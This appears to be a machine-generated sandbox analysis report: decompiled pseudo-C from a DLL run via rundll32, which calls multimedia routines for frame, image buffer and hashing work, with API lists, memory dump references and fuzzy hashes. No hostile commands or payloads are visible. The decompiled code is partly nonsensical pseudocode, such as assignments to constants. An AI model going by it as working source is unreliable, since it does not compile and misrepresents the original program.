                                                      				_v68 = _t93;
                                                      				_v64 = _t73;
                                                      				_v60 = _a24;
                                                      				_t51 = E1003A070(_t73, __edx, _t91, _t93);
                                                      				_t76 = _t51;
                                                      				if(_t51 < 0) {
                                                      					L13:
                                                      					return _t76;
                                                      				} else {
                                                      					 *_t98 = _t51;
                                                      					_t53 = E10026230();
                                                      					_t95 = _t53;
                                                      					if(_t53 == 0) {
                                                      						_t76 = 0xfffffff4;
                                                      						goto L13;
                                                      					} else {
                                                      						_v56 = _t73;
                                                      						_v60 = _t93;
                                                      						_v64 = _t91;
                                                      						_v68 = _t95;
                                                      						_v52 = _a24;
                                                      						_v72 = _a8;
                                                      						 *_t98 = _a4;
                                                      						_t57 = E1003A1B0();
                                                      						_t76 = _t57;
                                                      						if(_t57 < 0) {
                                                      							 *_t98 = _t95;
                                                      							_v36 = _t57;
                                                      							L100265B0();
                                                      							return _v36;
                                                      						} else {
                                                      							if(_t73 > 0xb) {
                                                      								_t91 = 1;
                                                      								_t84 = 0;
                                                      								_t94 = 0;
                                                      								goto L6;
                                                      							} else {
                                                      								_t87 = (_t73 + _t73 * 4) * 4 + "u8";
                                                      								_t88 =  *(_t87 + 0xc);
                                                      								_t63 =  *(_t87 + 8) >> 3;
                                                      								if(_t88 == 0) {
                                                      									_t64 = _t63 * _t91;
                                                      									_t91 = 1;
                                                      									_t94 = _t93 * _t64;
                                                      									_t84 = ((_t64 & 0xffffff00 | _t73 == 0x00000000 | _t88 & 0xffffff00 | _t73 == 0x00000005) & 0x000000ff) << 7;
                                                      									goto L6;
                                                      								} else {
                                                      									_t94 = _t93 * _t63;
                                                      									_t84 = ((_t63 & 0xffffff00 | _t73 == 0x00000000 | _t88 & 0xffffff00 | _t73 == 0x00000005) & 0x000000ff) << 7;
                                                      									if(_t91 > 0) {
                                                      										L6:
                                                      										_v32 = _t76;
                                                      										_t74 = _a4;
                                                      										_t96 = _t74;
                                                      										_v36 = _t74 + _t91 * 4;
                                                      										_t60 = _t84 * 0x1010101;
                                                      										_t75 = _t84;
                                                      										do {
                                                      											_t78 =  *_t96;
                                                      											_t85 = _t94;
                                                      											_t92 = _t78;
                                                      											if(_t94 >= 8) {
                                                      												if((_t78 & 0x00000001) != 0) {
                                                      													 *_t78 = _t60;
                                                      													_t45 = _t94 - 1; // -1
                                                      													_t85 = _t45;
                                                      													_t92 = _t92 + 1;
                                                      												}
                                                      												if((_t92 & 0x00000002) != 0) {
                                                      													 *_t92 = _t60;
                                                      													_t85 = _t85 - 2;
                                                      													_t92 = _t92 + 2;
                                                      												}
                                                      												if((_t92 & 0x00000004) != 0) {
                                                      													 *_t92 = _t60;
                                                      													_t85 = _t85 - 4;
                                                      													_t92 = _t92 + 4;
                                                      												}
                                                      												_t79 = _t85;
                                                      												_t85 = _t85 & 0x00000003;
                                                      												_t80 = _t79 >> 2;
                                                      												_t60 = memset(_t92, _t60, _t80 << 2);
                                                      												_t98 =  &(_t98[3]);
                                                      												_t92 = _t92 + _t80;
                                                      											}
                                                      											_t86 = _t85 & 0x00000007;
                                                      											if(_t86 != 0) {
                                                      												_t82 = 0;
                                                      												do {
                                                      													 *(_t92 + _t82) = _t75;
                                                      													_t82 = _t82 + 1;
                                                      												} while (_t82 < _t86);
                                                      											}
                                                      											_t96 =  &_a4;
                                                      										} while (_v36 != _t96);
                                                      										_t76 = _v32;
                                                      									}
                                                      								}
                                                      							}
                                                      							goto L13;
                                                      						}
                                                      					}
                                                      				}
                                                      			}











































                                                      APIs
                                                      • mv_samples_get_buffer_size.MAIN ref: 1003A34E
                                                      • mv_malloc.MAIN ref: 1003A360
                                                      • mv_samples_fill_arrays.MAIN ref: 1003A396
                                                        • Part of subcall function 1003A1B0: mv_samples_get_buffer_size.MAIN ref: 1003A201
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_samples_get_buffer_size$mv_mallocmv_samples_fill_arrays
                                                      • String ID:
                                                      • API String ID: 3894167361-0
                                                      • Opcode ID: 8d336f63005a17f0ce2746193248b8f2ccff729fc354cbe18226dd819581e305
                                                      • Instruction ID: 29f813314073505780b3b6a0bf21f4ec65a179872cc3375d0f3d993001abd10e
                                                      • Opcode Fuzzy Hash: 8d336f63005a17f0ce2746193248b8f2ccff729fc354cbe18226dd819581e305
                                                      • Instruction Fuzzy Hash: 0A419D75E083018FD705CF29C58460EFBE6EFCA355F55892EE8888B350E7B5E9858B42
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 55%
                                                      			E1001B0A4(void* __ebx, void* __edi, void* __esi) {
                                                      				void* _t70;
                                                      
                                                      				while(1) {
                                                      					__ebp = __ebp + __ebp;
                                                      					__eflags = __ebp - __esi;
                                                      					if(__eflags > 0) {
                                                      						break;
                                                      					}
                                                      					__eax =  *(__ebx + 0x44);
                                                      					__ebp =  ~__ebp;
                                                      					 *(__ebx + 0x44) + __ebp =  *(__ebx + 0x44) + __ebp - 1;
                                                      					__eax =  *(__ebx + 0x44) + __ebp - 0x00000001 &  ~__ebp;
                                                      					__esp[2] =  *(__ebx + 0x44) + __ebp - 0x00000001 &  ~__ebp;
                                                      					__eax =  *(__ebx + 0x50);
                                                      					 *__esp = __edi;
                                                      					__esp[1] =  *(__ebx + 0x50);
                                                      					__eax = L1001EAB0(__eflags);
                                                      					__eflags = __eax;
                                                      					__edx = __eax;
                                                      					if(__eax < 0) {
                                                      						L1:
                                                      						return _t70;
                                                      					}
                                                      					__eax =  *(__ebx + 0x20);
                                                      					__eflags = __esp[0xb] & __eax;
                                                      					if((__esp[0xb] & __eax) != 0) {
                                                      						continue;
                                                      					}
                                                      					__eflags = __eax;
                                                      					if(__eflags == 0) {
                                                      						L10:
                                                      						__esp[0xc] = __eax;
                                                      						__eax =  *(__ebx + 0x24);
                                                      						__esp[0xd] =  *(__ebx + 0x24);
                                                      						__eax =  *(__ebx + 0x28);
                                                      						__esp[0xe] =  *(__ebx + 0x28);
                                                      						__eax =  *(__ebx + 0x2c);
                                                      						__esp[0xf] =  *(__ebx + 0x2c);
                                                      						__eax =  *(__ebx + 0x48);
                                                      						__edi =  *(__ebx + 0x48) + 0x1f;
                                                      						__eax =  &(__esp[0xc]);
                                                      						__edi =  *(__ebx + 0x48) + 0x0000001f & 0xffffffe0;
                                                      						__esp[3] =  &(__esp[0xc]);
                                                      						__esp[2] = __edi;
                                                      						__eax =  *(__ebx + 0x50);
                                                      						__esp[1] =  *(__ebx + 0x50);
                                                      						__eax =  &(__esp[0x10]);
                                                      						 *__esp =  &(__esp[0x10]);
                                                      						__eax = L1001EE90(__ebx, __edi, __esi, __ebp, __eflags);
                                                      						__eflags = __eax;
                                                      						__edx = __eax;
                                                      						if(__eax < 0) {
                                                      							goto L1;
                                                      						}
                                                      						__eax = 0x20;
                                                      						__ecx = __esp[0x10];
                                                      						__edx = 0x7fffffff;
                                                      						__eflags = __esp[0x1d] - 0x20;
                                                      						__ebp = 0x7fffffff;
                                                      						__eax =  >=  ? __esp[0x1d] : 0x20;
                                                      						__esi = 0x20;
                                                      						__eax = ( >=  ? __esp[0x1d] : 0x20) * 4;
                                                      						__ebp = 0x7fffffdf;
                                                      						__eflags = 0x7fffffdf - __ecx;
                                                      						if(0x7fffffdf < __ecx) {
                                                      							L24:
                                                      							__edx = 0xffffffea;
                                                      							goto L1;
                                                      						}
                                                      						__ecx = __ecx + __eax;
                                                      						__eax = __esp[0x11];
                                                      						0x7fffffff = 0x7fffffff - __ecx;
                                                      						__eflags = 0x7fffffff - __ecx - __eax;
                                                      						if(0x7fffffff - __ecx < __eax) {
                                                      							goto L24;
                                                      						}
                                                      						__eax = __eax + __ecx;
                                                      						__ecx = __esp[0x12];
                                                      						__ebp = 0x7fffffff;
                                                      						__ebp = 0x7fffffff - __eax;
                                                      						__eflags = 0x7fffffff - __ecx;
                                                      						if(0x7fffffff < __ecx) {
                                                      							goto L24;
                                                      						}
                                                      						__eax = __eax + __ecx;
                                                      						__ecx = __esp[0x13];
                                                      						__edx = 0x7fffffff - __eax;
                                                      						__eflags = 0x7fffffff - __eax - __ecx;
                                                      						if(0x7fffffff - __eax < __ecx) {
                                                      							goto L24;
                                                      						}
                                                      						__eax = L10009DC0(__ebx, __ecx, __edi, 0x20, __ecx);
                                                      						 *(__ebx + 0xb8) = __eax;
                                                      						__eflags = __eax;
                                                      						if(__eax == 0) {
                                                      							__edx = 0xfffffff4;
                                                      							L26:
                                                      							__esp[0xb] = __edx;
                                                      							__ebx = E1001A460(__ebx);
                                                      							__edx = __esp[0xb];
                                                      							goto L1;
                                                      						}
                                                      						__edx = __ebx + 0x20;
                                                      						__esp[4] = __ebx + 0x20;
                                                      						__eax =  *(__eax + 4);
                                                      						__esp[2] = __edi;
                                                      						__esp[3] = __eax;
                                                      						__eax =  *(__ebx + 0x50);
                                                      						 *__esp = __ebx;
                                                      						__esp[1] =  *(__ebx + 0x50);
                                                      						__eax = L1001EFD0(__ebx, __edi, __esi, __ebp);
                                                      						__eflags = __eax;
                                                      						__edx = __eax;
                                                      						if(__eax < 0) {
                                                      							goto L26;
                                                      						}
                                                      						__eax =  *(__ebx + 4);
                                                      						__eflags = __eax;
                                                      						if(__eax != 0) {
                                                      							__eax = __eax + __esi;
                                                      							__eflags = __eax;
                                                      							 *(__ebx + 4) = __eax;
                                                      						}
                                                      						__eax =  *(__ebx + 8);
                                                      						__eflags = __eax;
                                                      						if(__eax != 0) {
                                                      							 *(__ebx + 8) = __eax;
                                                      						}
                                                      						__eax =  *(__ebx + 0xc);
                                                      						__eflags = __eax;
                                                      						if(__eax != 0) {
                                                      							__edx = __esi + __esi * 2;
                                                      							__eax = __eax + __esi + __esi * 2;
                                                      							__eflags = __eax;
                                                      							 *(__ebx + 0xc) = __eax;
                                                      						}
                                                      						 *(__ebx + 0x40) = __ebx;
                                                      						__edx = 0;
                                                      						goto L1;
                                                      					}
                                                      					break;
                                                      				}
                                                      				__ecx =  *(__ebx + 0x24);
                                                      				__eax = __esi + __eax - 1;
                                                      				__edx = __esi;
                                                      				__edx =  ~__esi;
                                                      				__eax = __eax & __edx;
                                                      				 *(__ebx + 0x20) = __eax;
                                                      				__eflags = __ecx;
                                                      				if(__eflags != 0) {
                                                      					__ecx = __esi + __ecx - 1;
                                                      					 *(__ebx + 0x24) = __ecx;
                                                      					__ecx =  *(__ebx + 0x28);
                                                      					__eflags = __ecx;
                                                      					if(__eflags != 0) {
                                                      						__ecx = __esi + __ecx - 1;
                                                      						 *(__ebx + 0x28) = __ecx;
                                                      						__ecx =  *(__ebx + 0x2c);
                                                      						__eflags = __ecx;
                                                      						if(__eflags != 0) {
                                                      							__edx = __edx & __ecx;
                                                      							__eflags = __edx;
                                                      							 *(__ebx + 0x2c) = __edx;
                                                      						}
                                                      					}
                                                      				}
                                                      				goto L10;
                                                      			}




                                                      0x1001b22b
                                                      0x1001b22e
                                                      0x1001b22e
                                                      0x1001b230
                                                      0x1001b230
                                                      0x1001b233
                                                      0x1001b236
                                                      0x00000000
                                                      0x1001b236
                                                      0x00000000
                                                      0x1001b0e2
                                                      0x1001b0e4
                                                      0x1001b0e7
                                                      0x1001b0eb
                                                      0x1001b0ed
                                                      0x1001b0ef
                                                      0x1001b0f1
                                                      0x1001b0f4
                                                      0x1001b0f6
                                                      0x1001b0f8
                                                      0x1001b0fe
                                                      0x1001b101
                                                      0x1001b104
                                                      0x1001b106
                                                      0x1001b108
                                                      0x1001b10e
                                                      0x1001b111
                                                      0x1001b114
                                                      0x1001b116
                                                      0x1001b11c
                                                      0x1001b11c
                                                      0x1001b11e
                                                      0x1001b11e
                                                      0x1001b116
                                                      0x1001b106
                                                      0x00000000

                                                      APIs
                                                      • mv_image_fill_linesizes.MAIN ref: 1001B0C8
                                                        • Part of subcall function 1001EAB0: mv_pix_fmt_desc_get.MAIN(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,1001B0CD), ref: 1001EAC6
                                                      • mv_image_fill_plane_sizes.MAIN ref: 1001B15D
                                                      • mv_buffer_alloc.MAIN ref: 1001B1CD
                                                      • mv_image_fill_pointers.MAIN ref: 1001B1FC
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_buffer_allocmv_image_fill_linesizesmv_image_fill_plane_sizesmv_image_fill_pointersmv_pix_fmt_desc_get
                                                      • String ID:
                                                      • API String ID: 2879504290-0
                                                      • Opcode ID: 7341e7224c3c084a21f5b683c78ee4c84bc759b0f2a3afcbc0be0c244e6f78e6
                                                      • Instruction ID: 8f506c5f79b5a5d03f9a5ada546bbcf13e993700c3781cdda1da6b75d303e5b0
                                                      • Opcode Fuzzy Hash: 7341e7224c3c084a21f5b683c78ee4c84bc759b0f2a3afcbc0be0c244e6f78e6
                                                      • Instruction Fuzzy Hash: 4151F9B5608B018FCB48DF69D5D066ABBE1FF88240F15897DE949CB359E731E884CB41
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 34%
                                                      			E100290D0(intOrPtr* __eax, intOrPtr __edx, signed int _a4, intOrPtr* _a8) {
                                                      				signed char _v540;
                                                      				signed int _v544;
                                                      				signed int _v548;
                                                      				intOrPtr* _v552;
                                                      				char _v553;
                                                      				intOrPtr _v560;
                                                      				intOrPtr _v564;
                                                      				intOrPtr _v568;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				intOrPtr* _t34;
                                                      				intOrPtr* _t48;
                                                      				intOrPtr _t55;
                                                      				intOrPtr _t56;
                                                      				intOrPtr _t58;
                                                      				signed char* _t59;
                                                      				void* _t60;
                                                      				intOrPtr* _t61;
                                                      
                                                      				_t61 = _t60 - 0x22c;
                                                      				_v552 = __eax;
                                                      				_v540 = 0;
                                                      				_v548 = _a4;
                                                      				_v544 = _a8;
                                                      				if(__edx == 0) {
                                                      					L18:
                                                      					return 0;
                                                      				} else {
                                                      					_t34 = _v552;
                                                      					if(_t34 == 0) {
                                                      						goto L18;
                                                      					} else {
                                                      						_t58 =  *_t34;
                                                      						_t55 = __edx;
                                                      						_t48 = 0;
                                                      						_v553 = 0;
                                                      						L3:
                                                      						while(1) {
                                                      							L3:
                                                      							while(1) {
                                                      								if(_t48 != 0) {
                                                      									L13:
                                                      									_t56 =  *((intOrPtr*)(_t48 + 0x30));
                                                      									if(_t56 != 0) {
                                                      										_t48 = _t48 + 0x30;
                                                      										goto L7;
                                                      									}
                                                      								} else {
                                                      									L4:
                                                      									if(_t58 == 0) {
                                                      										if(_t48 != 0) {
                                                      											goto L13;
                                                      										} else {
                                                      										}
                                                      									} else {
                                                      										_t48 = _a8;
                                                      										if(_t48 != 0) {
                                                      											_t56 =  *_t48;
                                                      											if(_t56 != 0) {
                                                      												L7:
                                                      												if( *((intOrPtr*)(_t48 + 0xc)) != 0xa) {
                                                      													continue;
                                                      												} else {
                                                      													_v568 = _t55;
                                                      													 *_t61 =  *((intOrPtr*)(_t48 + 0x2c));
                                                      													if(strcmp(??, ??) != 0 || (_v544 &  *(_t48 + 0x14) | _v548 &  *(_t48 + 0x10)) == 0) {
                                                      														continue;
                                                      													} else {
                                                      														_t59 =  &_v540;
                                                      														if(_v553 != 0) {
                                                      															 *_t61 = _t59;
                                                      															_v568 = 0x200;
                                                      															_v564 = 0x100b3e24;
                                                      															E100067F0(_t48, _t55, 0x200);
                                                      															_t56 =  *_t48;
                                                      														}
                                                      														 *_t61 = _t59;
                                                      														_v560 = _t56;
                                                      														_v564 = 0x100b3e26;
                                                      														_v568 = 0x200;
                                                      														E100067F0(_t48, _t55, _t56);
                                                      														_t58 =  *_v552;
                                                      														_v553 = _v540 & 0x000000ff;
                                                      														if(_t48 == 0) {
                                                      															goto L4;
                                                      														} else {
                                                      															goto L13;
                                                      														}
                                                      													}
                                                      												}
                                                      											}
                                                      										}
                                                      									}
                                                      								}
                                                      								if(_v553 != 0) {
                                                      									 *_t61 =  &_v540;
                                                      									return E100267C0(_t48, _t55, _t56, _t58);
                                                      								} else {
                                                      									goto L18;
                                                      								}
                                                      								goto L21;
                                                      							}
                                                      						}
                                                      					}
                                                      				}
                                                      				L21:
                                                      			}
























                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_strlcatfstrcmp
                                                      • String ID:
                                                      • API String ID: 3138383634-0
                                                      • Opcode ID: e6d04f5b88f278462d021f45b59cfba453c363faba32e7f9e0e655f4c856f37f
                                                      • Instruction ID: 4e00ca5e32ba23cd1f0d150041dade036c75141da2ff9e4549c40cdffe91d108
                                                      • Opcode Fuzzy Hash: e6d04f5b88f278462d021f45b59cfba453c363faba32e7f9e0e655f4c856f37f
                                                      • Instruction Fuzzy Hash: 3C316B75A083968FDB10DF6AE48475BBBE4EF84384F55486EEC9897201D334ED18CB92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • IsDBCSLeadByteEx.KERNEL32 ref: 1009D822
                                                      • MultiByteToWideChar.KERNEL32 ref: 1009D865
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: Byte$CharLeadMultiWide
                                                      • String ID:
                                                      • API String ID: 2561704868-0
                                                      • Opcode ID: e06c874c7b0f77f595b58fe30017b44e27d557a91db68f2b64ff68b0ac9c3ef2
                                                      • Instruction ID: b6030a99734b0483f6aa4200c2ea406aadadd20ec724542bcc610d09dc4c1d1f
                                                      • Opcode Fuzzy Hash: e06c874c7b0f77f595b58fe30017b44e27d557a91db68f2b64ff68b0ac9c3ef2
                                                      • Instruction Fuzzy Hash: 8431E2B45093918FD700EF68D58424BBBF0FF85354F00895EE8988B252D7BAD849DB92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: clockmv_sha_finalmv_sha_initmv_sha_update
                                                      • String ID:
                                                      • API String ID: 679641161-0
                                                      • Opcode ID: 6f861df05181ea4ff24294a19bc8cb2a57f6845d629d0ae6cd75aa9bb61d67ba
                                                      • Instruction ID: 2963d4e084b8430f89c99bd8ea125613e8711b22e7604053a18660b36ac50186
                                                      • Opcode Fuzzy Hash: 6f861df05181ea4ff24294a19bc8cb2a57f6845d629d0ae6cd75aa9bb61d67ba
                                                      • Instruction Fuzzy Hash: 63218D76A043108FE308EF38CAC424AB7E2EBC8316F95C93DDD889B355DA75D9058B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 57%
                                                      			E1001E54B(void* __eax) {
                                                      
                                                      				while(1) {
                                                      					__esp[1] = __eax;
                                                      					__eax = __esp[0x18];
                                                      					__edx = 0;
                                                      					__esp[2] = 0;
                                                      					 *__esp = __esp[0x18];
                                                      					__eax = E1001E2F0();
                                                      					__edi = __eax;
                                                      					if(__eax < 0) {
                                                      						break;
                                                      					}
                                                      					__eax = __esp[0xa];
                                                      					__ebp = __ebp + 1;
                                                      					__eax =  *(__esp[0xa] + 0x20);
                                                      					if(__ebp >= __eax) {
                                                      						__esi = __esp[0xb];
                                                      						__ebx = __edi;
                                                      						__edx = __esp[0xa];
                                                      						L8:
                                                      						if(__eax <= 0) {
                                                      							__eax =  &(__esp[0xf]);
                                                      							__ebx = 0;
                                                      							E100265C0( &(__esp[0xf]));
                                                      							L2:
                                                      							return 0;
                                                      						}
                                                      						L9:
                                                      						__edi = 0;
                                                      						__ebp = __edx;
                                                      						do {
                                                      							__esp[0xf] = __esp[0xf] + __edi * 4;
                                                      							__edi = __edi + 1;
                                                      							__eax = L1001ADB0(__ebx, __eax);
                                                      						} while (__edi <  *((intOrPtr*)(__ebp + 0x20)));
                                                      						__eax =  &(__esp[0xf]);
                                                      						E100265C0( &(__esp[0xf]));
                                                      						if(__ebx >= 0) {
                                                      							goto L2;
                                                      						}
                                                      						L12:
                                                      						__eax = __esi[1];
                                                      						__eax =  *(__esi[1]);
                                                      						__eax =  *( *(__esi[1]) + 0x38);
                                                      						if(__eax != 0) {
                                                      							 *__esp = __esi;
                                                      							__eax =  *__eax();
                                                      						}
                                                      						goto L2;
                                                      					}
                                                      					__esi = __esp[0xf];
                                                      					__eax = L1001AC40(__ebx, __edi, __esi);
                                                      					__ebx = __ebp * 4;
                                                      					 *__esi = __eax;
                                                      					__eax = __esp[0xf];
                                                      					__eax =  *(__esp[0xf] + __ebx);
                                                      					if(__eax != 0) {
                                                      						continue;
                                                      					}
                                                      					__edx = __esp[0xa];
                                                      					__ebx = __edi;
                                                      					__esi = __esp[0xb];
                                                      					__eax =  *(__edx + 0x20);
                                                      					goto L8;
                                                      				}
                                                      				__edx = __esp[0xa];
                                                      				__ebx = __eax;
                                                      				__esi = __esp[0xb];
                                                      				__eax =  *(__edx + 0x20);
                                                      				if( *(__edx + 0x20) > 0) {
                                                      					goto L9;
                                                      				}
                                                      				__eax =  &(__esp[0xf]);
                                                      				E100265C0( &(__esp[0xf]));
                                                      				goto L12;
                                                      			}




                                                      APIs
                                                      • mv_hwframe_get_buffer.MAIN ref: 1001E561
                                                        • Part of subcall function 1001E2F0: mv_buffer_ref.MAIN(?,?,?,?,?,?,?,?,?,?,?,00000000,1001C33B), ref: 1001E317
                                                        • Part of subcall function 1001E2F0: mv_frame_alloc.MAIN(?,?,?,?,?,?,?,?,?,?,?,00000000,1001C33B), ref: 1001E32A
                                                        • Part of subcall function 1001E2F0: mv_hwframe_map.MAIN(?,?,?,?,?,?,?,?,?,?,?,00000000,1001C33B), ref: 1001E36C
                                                        • Part of subcall function 1001E2F0: mv_log.MAIN ref: 1001E396
                                                        • Part of subcall function 1001E2F0: mv_frame_free.MAIN ref: 1001E3A2
                                                      • mv_frame_alloc.MAIN ref: 1001E584
                                                        • Part of subcall function 1001AC40: mv_malloc.MAIN ref: 1001AC56
                                                      • mv_frame_free.MAIN ref: 1001E5CB
                                                      • mv_freep.MAIN ref: 1001E5DC
                                                      • mv_freep.MAIN ref: 1001E61B
                                                      • mv_freep.MAIN ref: 1001E63A
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_freep$mv_frame_allocmv_frame_free$mv_buffer_refmv_hwframe_get_buffermv_hwframe_mapmv_logmv_malloc
                                                      • String ID:
                                                      • API String ID: 2206481229-0
                                                      • Opcode ID: 25283562a18f3cc925092daff3d8813b508f0ce4e67f46393089d96786ff75ef
                                                      • Instruction ID: ca945ac18ed839ac5bf74ac2fa747fd2f81b9f58e27d0342db77472b587ece54
                                                      • Opcode Fuzzy Hash: 25283562a18f3cc925092daff3d8813b508f0ce4e67f46393089d96786ff75ef
                                                      • Instruction Fuzzy Hash: F42126756087518FD340DF29C880A4EF3E5FF89354F468869E988DB321E770EC858B41
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 58%
                                                      			E100027B0(void* __edx, void* __eflags) {
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				void* _t23;
                                                      				void* _t27;
                                                      				intOrPtr _t28;
                                                      				void* _t33;
                                                      				void* _t34;
                                                      				void* _t36;
                                                      				intOrPtr _t38;
                                                      				void* _t39;
                                                      				signed int _t40;
                                                      				intOrPtr* _t41;
                                                      				intOrPtr* _t42;
                                                      
                                                      				_t36 = __edx;
                                                      				_t41 =  *((intOrPtr*)(_t42 + 0x50));
                                                      				_t38 =  *((intOrPtr*)(_t42 + 0x54));
                                                      				 *_t42 =  *((intOrPtr*)( *_t41));
                                                      				_t39 = L10017F10();
